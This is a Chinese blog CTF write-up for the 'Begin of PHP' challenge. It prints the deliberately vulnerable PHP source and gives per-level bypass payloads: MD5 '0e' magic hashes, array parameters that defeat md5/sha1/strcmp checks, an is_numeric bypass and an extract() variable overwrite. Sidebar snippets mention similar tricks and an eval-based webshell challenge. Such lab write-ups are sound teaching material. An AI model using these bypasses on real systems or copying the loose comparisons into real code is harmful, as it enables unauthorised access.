buuctf Begin of PHP

最新推荐文章于 2023-11-13 21:23:03 发布
最新推荐文章于 2023-11-13 21:23:03 发布
阅读量264 收藏 1
点赞数
分类专栏: CTF 文章标签: php 网络安全 密码学 web安全 安全架构 安全威胁分析 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wp568/article/details/133445255
版权 
<?php
error_reporting(0);
highlight_file(__FILE__);

if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}

=Level 1=

md5绕过

key1=s878926199a&key2=s214587387a

=Level 2=

数组绕过

key3[]=13

=Level 3=

数组绕过

key4[]=1

=Level 4=

  is_numeric($num)函数绕过

key5=2024%20%00

=Level 5=

数组绕过

flag5[]=True;

payload:

?key1=s878926199a&key2=s214587387a&key4[]=1&key5=2024%20%00

post: key3[]=13;&flag5[]=True;

半两八金
关注
专栏目录
K8s(二十):访问 Prometheus UI界面:kubernetes-etcd (0/1 up) Error : out of bounds
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
04-15 1万+
🔴 K8s(二十):访问 Prometheus UI界面:kubernetes-etcd (0/1 up) Error : out of bounds
Linux/ubuntu AWK / BEGIN / END的用法
菜鸟清风
01-18 1万+
https://blog.csdn.net/frank_ldw/article/details/86534675 BEGIN和END: 在Unix awk中两个特别的表达式,BEGIN和END,这两者都可用于pattern中(参考前面的awk语法),提供BEGIN和END的作用是给程序赋予初始状态和在程序结束之后执行一些扫尾的工作。 任何在BEGIN之后列出的操作(在{}内)将在Unix a...
Begin of PHP(NewStar week1 web2023)
qq_66013948的博客
10-26 216
很明显,这道题是用md5函数处理得到的key1和key2两个参数,这个时候,就需要知道php弱比较中的md5(),sha1()函数无法处理数组,如果传入的为数组,会返回NULL,两个数组经过加密后得到的都是NULL,也就是相等的,所以应该构造。这里可以知道,这里只需要让flag5为真就能够得到flag了,但是,在这里a-z,A-Z,0-9全被过滤了,那么,就要用非字母和数字的方式将其绕过,用post方式传递。is_numeric()可以检测参数为数字或者是字符串,是的话返回1,可以用多种方式绕过。
NewStarCTF 2023 Week1 web官方wp
m0_63641882的博客
10-04 706
进入题目首先要求以GET方式传参:http://ec7fe482-428e-4978-8b2c-4016472b07a7.node4.buuoj.cn:81/index.php?ctf=ok接着要求以POST方式传递secret参数,并且secret参数的值是固定的: 右键查看页面源代码可以看到base64编码后的secret值: base64解码得到 使用HackBar发送secret: 添加X-Real-IP头,
【2023NewStar】#Week1 Web和Crypto 全题解!涉及知识扩展~
jayq1的博客
10-02 1569
本篇文章在web方面属于中规中矩的解法,师傅们看着玩叭,在crypto方面是有一些知识扩展的,包括仿射密码、连分数等~
BUUCTF NewStarCTF 2023 WEB题WP
qq_65165505的博客
10-07 2679
NewStarCTF 2023 公开赛道 web题目wp
php中sha1,PHP中sha1()函数和md5()函数的绕过
weixin_39997664的博客
03-28 1127
相信大家都知道,sha1函数和md5都是哈希编码的一种,在PHP中,这两种编码是存在绕过漏洞的。PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。因此我们只需要传入开头都是0E的两个值,便可成功绕过。例如这个代码(sha1($_GET...
mysql事务处理 begin_mysql 事务处理
weixin_36041939的博客
02-18 3725
mysql 事务处理(表的引擎必须是 innodb / BDB)主要是两种两法:推荐用第一种1.用 begin,rollback,commit 来实现begin 开始一个事务rollback 事务回滚commit 事务提交2.直接用 set 来改变 mysql的自动提交模式,系统默认是自动提交的set autocommit = 0; 禁止自动提交set autocommit = 1; 开启自动...
mybatis mysql begin end_mybatis批量操作
weixin_34910465的博客
02-01 2517
首先,mysql需要数据库连接配置&allowMultiQueries=truejdbc:mysql://127.0.0.1:3306/mybank?useUnicode=true&characterEncoding=utf8&allowMultiQueries=trueoracle下支持执行多条语句,下面3个相同update T_EMP_1age = #{item.age...
OpenSSH私钥BEGIN OPENSSH PRIVATE KEY与BEGIN RSA PRIVATE KEY格式转换方式
热门推荐
loongshawn的博客
08-20 1万+
OpenSSH私钥BEGIN OPENSSH PRIVATE KEY与BEGIN RSA PRIVATE KEY转换方式
2023 NewStarCTF --- wp
3tefanie丶zhou的博客
10-09 3442
【活着得,怎么就轻松惬意了,无需愧疚。】
分享一些题目
..
12-06 1052
一、无字母webshell,题目如下 <?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>40){ die("Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){ die("NO."); } @eval($code); }else{
特辑__NewStarCTF__WebWeek1__WP
qq_41174589的博客
11-03 136
(2):在源码中找到secret并利用hackber给secret传参。等下我好像忽视了什么东西《not ssti》,不管了,找一找有没有什么有用的东西。(5):传入除数字和字母的任意符号(正则匹配ban掉了。(1):先按F12再按F1禁用JavaScript。(6):添加X-Real-IP:127.0.0.1。(4):选择根目录,发现flag(最下面)(1):在URL后加上/?(3):burp抓包修改Cookie。(4):修改User-Agent。然后传参数传了半天没反应,查到了这个(呆滞。
PHP中sha1()函数和md5()函数的绕过
weixin_46578840的博客
08-10 1747
PHP中sha1()函数和md5()函数的绕过 sha1函数和md5都是哈希编码的一种,在PHP中,这两种编码是存在绕过漏洞的。 PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 只需要传入开头都是0E的两个值,便可成功绕过。 例如这个代码(sha1($_GET['uname']) === sha1($_POST['passwd'])
PHP 中的sha1()和MD5()函数漏洞
m0_52920608的博客
04-11 581
php中SHA1()和MD5()绕过
2023NewStarCtf WEB [WEEK1] 超详细题目思路wp
2301_76690905的博客
10-10 528
扫描目录得到www.zip,下载到电脑后打开里面有index.php和robots.txt,点开得到两段flag,拼接得到完整flag。
PHP数组foreach遍历输出例子详解
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-10 782
  通常我们对于数据遍历会使用到foreach来操作当然也有使用到while list each函数来实现了,但在方便面上来看foreach更简洁好用性能也非常的不错,下面本人整理了一款在开发应用中foreach前后使用例子,希望对大家会有所帮助。   简单的一个php数组函数,之前没这个需要一直都不知道有这么一个函...
newstarctf 2023 week1
最新发布
lgsyydsa的博客
11-13 164
buuctf里的新生赛(都停止提交了,flag也不知道对不对)
md5一些绕过方法
m0_56059226的博客
07-16 2655
弱比较 if($_POST['a']!=$_POST['b']&& md5($_POST['a'])==md5($_POST['b'])){ die("success!"); } 在这样的弱比较里,0e开头的会被识别成科学计数法,结果均为0,比较时0=0为true绕过 payload: a=QNKCDZO&b=s878926199a 常用md5加密后为0的字符串: 240610708,aabg7XSs,aabC9RqS s878926199a 0e215962017...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半两八金

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值